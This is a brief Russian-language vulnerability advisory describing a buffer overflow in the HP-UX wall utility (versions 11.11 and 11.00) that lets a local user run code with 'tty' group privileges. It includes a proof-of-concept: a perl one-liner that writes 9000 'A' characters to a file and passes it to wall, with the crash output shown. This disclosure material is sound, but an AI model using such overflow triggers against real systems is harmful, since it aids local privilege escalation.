Переполнение буфера обнаружено в /usr/sbin/wall в операционной системе HP/UX. Локальный пользователь может выполнить произвольный код с
повышенными привилегиями. 

Сообщается, что локальный пользователь может вызвать переполнение буфера, создавая специально обработанный файл, который будет широковещательно передан утилите wall. Уязвимость позволяет локальному пользователю выполнить произвольный код с привилегиями ‘tty’ группы. 

Пример: 

(Tested on HPUX 11.11)

perl -e ‘print «A» x 9000’ > /tmp/out
/usr/sbin/wall /tmp/out
Memory fault

(Tested on HPUX 11.00)
perl -e ‘print «A» x 9000’ > /tmp/out
/usr/sbin/wall /tmp/out
bash-2.04$ /usr/sbin/wall /tmp/out
Segmentation fault

Уязвимость обнаружена в HP/UX 11.11, 11.00.



Оставить мнение